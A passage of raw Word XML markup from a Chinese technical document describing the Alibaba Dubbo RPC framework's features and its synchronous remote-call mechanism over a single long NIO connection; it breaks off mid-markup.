    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="00B355D3" w:rsidP="005A2F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>透明化的远程方法调用，就像调用本地方法一样调用远程方法，只需简单配置，没有任何</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>侵入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="00B355D3" w:rsidP="005A2F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>软负载均衡及容错机制，可在内网替代</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>F5</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等硬件负载均衡器，降低成本，减少单点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD1CBD" w:rsidP="005A2F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务自动注册与发现，不再需要写死服务提供方地址，注册中心基于接口名查询服务提供者的</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址，并且能够平滑添加或删除服务提供者</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD1CBD" w:rsidP="005A2F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用全</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>配置方式，透明化接入应用，对应用没有任何</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>侵入，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00323ECF" w:rsidRPr="00F41A4C" w:rsidRDefault="00323ECF" w:rsidP="00323ECF">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00F41A4C" w:rsidRDefault="00A368BE" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00805B59" w:rsidP="00483319">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>.4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00D01C58" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D01C58" w:rsidRPr="00F41A4C">
        <w:t>原理分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00F41A4C" w:rsidRDefault="00310A17" w:rsidP="00A368BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>远程同步调用原理分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开源文档上了解到一个调用过程如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00DA54D7" w:rsidP="00310A17">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId297" w:anchor="UserGuide-APIReference" w:history="1">
        <w:r w:rsidR="00310A17" w:rsidRPr="00B355D3">
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
            <w:color w:val="3D3D3D"/>
            <w:kern w:val="2"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://code.alibabatech.com/wiki/display/dubbo/User+Guide#UserGuide-APIReference</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>另外文档里有说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缺省协议采用单一长连接和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异步通讯，适合于小数据量大并发的服务调用，以及服务消费者机器数远大于服务提供者机器数的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5189967" cy="1330657"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="图片 1" descr="【原创】Alibaba Dubbo框架同步调用原理分析-1 - sun - 学无止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原创】Alibaba Dubbo框架同步调用原理分析-1 - sun - 学无止境"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191149" cy="1330960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dubbo</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缺省协议，使用基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mina1.1.7+hessian3.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tbremoting</w:t>
      </w:r>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:kern w:val="2"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>交互。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接个数：单连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="430"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B355D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接方式：长连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310A17" w:rsidRPr="00B355D3" w:rsidRDefault="00310A17" w:rsidP="00310A17">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
